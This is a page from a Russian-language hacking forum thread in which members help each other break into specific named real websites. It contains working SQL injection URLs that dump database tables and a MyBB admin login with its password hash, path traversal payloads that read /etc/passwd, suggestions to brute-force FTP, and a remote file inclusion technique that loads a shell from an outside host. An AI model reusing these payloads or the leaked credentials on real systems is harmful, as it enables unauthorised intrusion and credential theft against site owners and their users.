Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    x311, ну так скинь зареганный акк...
     
  2. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    1.Гы))Вбивай кавычки везде )))
    2.Ini_get()
    3.phpinfo()
    4.Мб CVS на сервере дежурит:).
    5.Поискать инклуд или sql и попробывать прочесть файл.
    6.Поглядеть исходники
    7.Посмотреть в Гугле описание директивы mysql_quotes_gpc и не задавать этот вопрос снова:)
     
    1 person likes this.
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Вот...

    Code:
    http://trophymanager.com/klubhus.php?showclub=1+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14--
     
    #5143 R1dex, 31 Jan 2009
    Last edited: 31 Jan 2009
  4. Mirella

    Mirella New Member

    Joined:
    30 Jul 2008
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
    http://hl-online.ru/photos/admin.php
    http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
    http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
    http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
    http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
    http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world

    что можно с этим добром сделать ? как дальше пройти?
     
  5. iSee

    iSee Banned

    Joined:
    27 Jan 2009
    Messages:
    8
    Likes Received:
    6
    Reputations:
    1
    Брутить ФТП или как вариант почитать сорцы конфигов движка с целью доступа к БД или мб к панели администратора
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
     
  7. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--

    Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
     
  8. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Assembler,
     
    1 person likes this.
  9. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А где написано, что они должны все выводиться?
    Да, иногда ошибку даёт, не в лимите дело, он и без него иногда ничего не выводит. Но в любом случае вывести можно, там 346 таблиц, несколько раз делай запрос , до вывода, других способов всё равно нет
     
    2 people like this.
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Зачем через group_concat? Делай просто через limit по одному.
    http://www.rapidshare.ru/909903 - вот тебе список всех таблиц! Самые полезные: user и mybb_users
    http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=0x75736572++-- это колонки таблицы user
    http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,column_name+from+information_schema.columns+where+table_name=0x6d7962625f7573657273++-- колонки таблицы mybb_users
    http://www.wowpourlesnuls.fr/images.php?img=-1+union+select+1,concat_ws(0x3a,uid,username,password)+from+mybb_users--
    1:Admin:5d3fd0aa8e2c38d1b632a1a2d09f46dd - вот логин и пароль из таблицы mybb_users
     
    #5150 Tigger, 31 Jan 2009
    Last edited: 31 Jan 2009
    3 people like this.
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    https://forum.antichat.ru/showpost.php?p=1075672&postcount=4940

    Есть еще знак > и < и т.д. Лимит не везде доступен при скулях
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Pashkela Не понял. Ты отвечал на какой-то мой вопрос?
    Если на этот --> А где написано, что они должны все выводиться?
    То ответа по ссылке на нашол, да и не стоит беспокоится, вопрос риторический :)
    Насчёт лимита:
    Там работает лимит, просто скрипт глючит иногда.
     
  13. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    как это у вас проходят конструкции group_concat+limit, я думал функции с аргументами выборки не дружат с лимитом,
    на вашем же примере если задавать начальные позиции <>0
    вот ещё 1 пример, вывод есть:
    вывода нет
    и чем вас не устраивает вариант group_concat(user order by 'user') where user>'user' ? '(
     
    1 person likes this.
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Какой ещё group_concat+limit? Лично я говорил про лимит отдельно, груп конкат отдельно. Возможно не достаточно понятно выразился, извиняйте.
    Я тебе уже говорил, что подзапросы и условия-- это не наш метод, нам нужна кнопка "Залить шелл" :D

    ===========================
    add: кстати о проститутках, их можно группировать :) Например так(разбиваем по базам):

    http://mskputana.ru/list.php?foto=p44512_3.jpg&link=-1+union+select+group_concat(table_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+information_schema.tables+group+by+table_schema+limit+2,1--+

    При таком раскладе лимит ,разумеется, работает отлично

    Ну а не на information_schema, тоже можно групировать по полю, админов там всех вывести и т.д
    Типо:
    -1+union+select+group_concat(concat_ws(0x2f,user,password,file_priv)),2,3,4,5,6+from+mysql.user+group+by+file_priv+limit+1,1

    Ну и т.д., тоже конечно не панацея, но как вариант покатит
     
    #5154 Kakoytoxaker, 31 Jan 2009
    Last edited: 31 Jan 2009
    3 people like this.
  15. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    У меня такой вопрос, подобрал например в скуле количество выводимых полей, конструкция такого типа выводит данные -1+group+by+1, но как только делаю union даные не выводятся, вот сылка
    HTML:
    http://www2.cali.org/index.php?fuseaction=conference.ViewAgenda&eventid=-1+union+select+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/*
    Как я понял нужно делать через сабгверю?
     
  16. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    (10 символов)
     
    4 people like this.
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Как он принимается за пхп,если не обрабатывается интерпретатором,если ток не указано в httpd.conf его обрабатывать как пхп сценарий.Или ты имеешь ввиду,что можно залить любой тхт файл ?
     
  18. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Велемир ты разницу между заливкой и инклудом видишь?

    При инклуде расширение не играет роли, любой файл можно включить и он обработается Tigger прав.
     
    1 person likes this.
  19. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Желательно именно *.txt, потому что не всегда можно *.php заливать
     
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Видимо нет =\

    http://php.su/functions/?include
    http://php.su/functions/?require

    Это не заливка, а ВКЛЮЧЕНИЕ
     
    2 people like this.
Thread Status:
Not open for further replies.